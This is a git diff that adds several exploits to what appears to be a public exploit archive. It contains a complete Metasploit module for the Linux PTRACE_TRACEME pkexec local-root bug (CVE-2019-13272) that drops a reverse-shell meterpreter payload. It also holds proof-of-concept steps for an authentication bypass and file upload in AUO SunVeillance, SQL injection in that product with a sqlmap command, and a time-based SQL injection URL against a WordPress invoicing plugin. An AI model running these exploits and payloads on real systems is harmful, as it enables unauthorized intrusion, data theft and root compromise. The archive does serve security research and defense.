diff --git a/exploits/hardware/webapps/47541.txt b/exploits/hardware/webapps/47541.txt new file mode 100644 index 000000000..0b82dd77b --- /dev/null +++ b/exploits/hardware/webapps/47541.txt @@ -0,0 +1,23 @@ +# Exploit Title: AUO SunVeillance Monitoring System 1.1.9e - Incorrect Access Control +# Date: 2019-10-24 +# Exploit Author: Luca.Chiou +# Vendor Homepage: https://www.auo.com/zh-TW +# Version: AUO SunVeillance Monitoring System all versions prior to v1.1.9e +# Tested on: It is a proprietary devices: https://solar.auo.com/en-global/Support_Download_Center/index +# CVE: N/A + +# 1. Description: +# An issue was discovered in AUO SunVeillance Monitoring System. +# There is an incorrect access control vulnerability that can allow the attacker to +# bypass the authentication mechanism, and upload files to the server without any authentication. + +# 2. Proof of Concept: +(1) Access the picture management page of AUO SunVeillance Monitoring System (/Solar_Web_Portal/Picture_Manage_mvc.aspx) without + any authentication. As a guest role, user is not allowed to upload a picture. However, there are two parameters, Act and authority, in Picture_Manage_mvc.aspx. +(2) Modify the value of parameter authority from 40 to 100. You can find out the upload button is enabled. +(3) Now you can upload a file successfully. +(4) The file which we uploaded is storing in server side. It’s means any user without authentication can upload files to server side. + +Thank you for your kind assistance. + +Luca \ No newline at end of file diff --git a/exploits/hardware/webapps/47542.txt b/exploits/hardware/webapps/47542.txt new file mode 100644 index 000000000..adbd3ae74 --- /dev/null +++ b/exploits/hardware/webapps/47542.txt @@ -0,0 +1,31 @@ +# Exploit Title: AUO SunVeillance Monitoring System 1.1.9e - 'MailAdd' SQL Injection +# Date: 2019-10-24 +# Exploit Author: Luca.Chiou +# Vendor Homepage: https://www.auo.com/zh-TW +# Version: AUO SunVeillance Monitoring System all versions prior to v1.1.9e +# Tested on: It is a proprietary devices: https://solar.auo.com/en-global/Support_Download_Center/index +# CVE: N/A + +# 1. Description: +# AUO SunVeillance Monitoring System all versions prior to v1.1.9e that is vulnerable to SQL Injection. +# The vulnerability can allow the attacker inject maliciously SQL command to the server which allows +# the attacker to read privileged data. + +# 2. Proof of Concept: + +(1) Access the sending mail page of AUO SunVeillance Monitoring System (/Solar_Web_Portal/mvc_send_mail.aspx) without any authentication. + There is a parameter, MailAdd, in mvc_send_mail.aspx. +(2) Modify the value of parameter MailAdd with single quotation. The error messages contains oracle database information. +(3) By using sqlmap tools, attacker can acquire the database list which in server side. + +cmd: sqlmap.py -u “https:///Solar_Web_Portal/mvc_send_mail.aspx?MailAdd=” -p MailAdd –dbs + +(4) Furthermore, there are a few SQL Injection vulnerabilities in other fields. + +picture_manage_mvc.aspx (parameter: plant_no) +swapdl_mvc.aspx (parameter: plant_no) +account_management.aspx (parameter: Text_Postal_Code, Text_Dis_Code) + +Thank you for your kind assistance. + +Luca \ No newline at end of file diff --git a/exploits/linux/local/47543.rb b/exploits/linux/local/47543.rb new file mode 100755 index 000000000..c3885778f --- /dev/null +++ b/exploits/linux/local/47543.rb @@ -0,0 +1,132 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Post::Linux::Priv + include Msf::Post::Linux::Kernel + include Msf::Post::Linux::System + include Msf::Post::Linux::Compile + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Linux Polkit pkexec helper PTRACE_TRACEME local root exploit', + 'Description' => %q{ + This module exploits an issue in ptrace_link in kernel/ptrace.c before Linux + kernel 5.1.17. This issue can be exploited from a Linux desktop terminal, but + not over an SSH session, as it requires execution from within the context of + a user with an active Polkit agent. + In the Linux kernel before 5.1.17, ptrace_link in kernel/ptrace.c mishandles + the recording of the credentials of a process that wants to create a ptrace + relationship, which allows local users to obtain root access by leveraging + certain scenarios with a parent-child process relationship, where a parent drops + privileges and calls execve (potentially allowing control by an attacker). One + contributing factor is an object lifetime issue (which can also cause a panic). + Another contributing factor is incorrect marking of a ptrace relationship as + privileged, which is exploitable through (for example) Polkit's pkexec helper + with PTRACE_TRACEME. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'Jann Horn', # Discovery and exploit + 'bcoles', # Metasploit module + 'timwr', # Metasploit module + ], + 'References' => [ + ['CVE', '2019-13272'], + ['EDB', '47133'], + ['PACKETSTORM', '153663'], + ['URL', 'https://github.com/bcoles/kernel-exploits/tree/master/CVE-2019-13272'], + ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1903'], + ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Platform' => [ 'linux' ], + 'Arch' => [ ARCH_X64 ], + 'Targets' => [[ 'Auto', {} ]], + 'DefaultOptions' => + { + 'Payload' => 'linux/x64/meterpreter/reverse_tcp', + 'PrependFork' => true, + }, + 'DisclosureDate' => 'Jul 4 2019')) + register_advanced_options [ + OptBool.new('ForceExploit', [false, 'Override check result', false]), + OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) + ] + end + + def check + # Introduced in 4.10, but also backported + # Patched in 4.4.185, 4.9.185, 4.14.133, 4.19.58, 5.1.17 + release = kernel_release + v = Gem::Version.new release.split('-').first + + if v >= Gem::Version.new('5.1.17') || v < Gem::Version.new('3') + vprint_error "Kernel version #{release} is not vulnerable" + return CheckCode::Safe + end + vprint_good "Kernel version #{release} appears to be vulnerable" + + unless command_exists? 'pkexec' + vprint_error 'pkexec is not installed' + return CheckCode::Safe + end + vprint_good 'pkexec is installed' + + arch = kernel_hardware + unless arch.include? 'x86_64' + vprint_error "System architecture #{arch} is not supported" + return CheckCode::Safe + end + vprint_good "System architecture #{arch} is supported" + + loginctl_output = cmd_exec('loginctl --no-ask-password show-session "$XDG_SESSION_ID" | grep Remote') + if loginctl_output =~ /Remote=yes/ + print_warning 'This is exploit requires a valid policykit session (it cannot be executed over ssh)' + return CheckCode::Safe + end + + CheckCode::Appears + end + + def exploit + if is_root? && !datastore['ForceExploit'] + fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' + end + + unless check == CheckCode::Appears + unless datastore['ForceExploit'] + fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' + end + print_warning 'Target does not appear to be vulnerable' + end + + unless writable? datastore['WritableDir'] + fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable" + end + + payload_file = "#{datastore['WritableDir']}/.#{Rex::Text.rand_text_alpha_lower(6..12)}" + upload_and_chmodx(payload_file, generate_payload_exe) + register_file_for_cleanup(payload_file) + + exploit_file = "#{datastore['WritableDir']}/.#{Rex::Text.rand_text_alpha_lower(6..12)}" + if live_compile? + vprint_status 'Live compiling exploit on system...' + upload_and_compile exploit_file, exploit_data('CVE-2019-13272', 'poc.c') + else + vprint_status 'Dropping pre-compiled exploit on system...' + upload_and_chmodx exploit_file, exploit_data('CVE-2019-13272', 'exploit') + end + register_file_for_cleanup(exploit_file) + + print_status("Executing exploit '#{exploit_file}'") + result = cmd_exec("echo #{payload_file} | #{exploit_file}") + print_status("Exploit result:\n#{result}") + end +end \ No newline at end of file diff --git a/exploits/php/webapps/47540.txt b/exploits/php/webapps/47540.txt new file mode 100644 index 000000000..f682bee16 --- /dev/null +++ b/exploits/php/webapps/47540.txt @@ -0,0 +1,19 @@ +# Exploit Title: Wordpress Sliced Invoices 3.8.2 - 'post' SQL Injection +# Date: 2019-10-22 +# Exploit Author: Lucian Ioan Nitescu +# Contact: https://twitter.com/LucianNitescu +# Webiste: https://nitesculucian.github.io +# Vendor Homepage: https://slicedinvoices.com/ +# Software Link: https://wordpress.org/plugins/sliced-invoices/ +# Version: 3.8.2 +# Tested on: Ubuntu 18.04 / Wordpress 5.3 + +# 1. Description: +# Wordpress Sliced Invoices plugin with a version lower then 3.8.2 is affected +# by an Authenticated SQL Injection vulnerability. + +# 2. Proof of Concept: +# Authenticated SQL Injection: +- Using an Wordpress user, access /wp-admin/admin.php?action=duplicate_quote_invoice&post=8%20and%20(select*from(select(sleep(20)))a)--%20 +- The response will be returned after 20 seconds proving the successful exploitation of the vulnerability. +- Sqlmap can be used to further exploit the vulnerability. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index dbb1faa89..c9d266d08 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10732,6 +10732,7 @@ id,file,description,date,author,type,platform,port 47527,exploits/windows/local/47527.txt,"Trend Micro Anti-Threat Toolkit 1.62.0.1218 - Remote Code Execution",2019-10-21,hyp3rlinx,local,windows, 47529,exploits/solaris/local/47529.txt,"Solaris 11.4 - xscreensaver Privilege Escalation",2019-10-21,"Marco Ivaldi",local,solaris, 47538,exploits/windows/local/47538.txt,"IObit Uninstaller 9.1.0.8 - 'IObitUnSvr' Unquoted Service Path",2019-10-23,"Sainadh Jamalpur",local,windows, +47543,exploits/linux/local/47543.rb,"Linux Polkit - pkexec helper PTRACE_TRACEME local root (Metasploit)",2019-10-24,Metasploit,local,linux, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -41858,3 +41859,6 @@ id,file,description,date,author,type,platform,port 47524,exploits/php/webapps/47524.py,"Joomla! 3.4.6 - Remote Code Execution",2019-10-18,"Alessandro Groppo",webapps,php, 47537,exploits/linux/webapps/47537.txt,"Rocket.Chat 2.1.0 - Cross-Site Scripting",2019-10-23,3H34N,webapps,linux, 47539,exploits/php/webapps/47539.rb,"Joomla! 3.4.6 - Remote Code Execution (Metasploit)",2019-10-23,"Alessandro Groppo",webapps,php, +47540,exploits/php/webapps/47540.txt,"Wordpress Sliced Invoices 3.8.2 - 'post' SQL Injection",2019-10-24,"Lucian Ioan Nitescu",webapps,php, +47541,exploits/hardware/webapps/47541.txt,"AUO SunVeillance Monitoring System 1.1.9e - Incorrect Access Control",2019-10-24,Luca.Chiou,webapps,hardware, +47542,exploits/hardware/webapps/47542.txt,"AUO SunVeillance Monitoring System 1.1.9e - 'MailAdd' SQL Injection",2019-10-24,Luca.Chiou,webapps,hardware,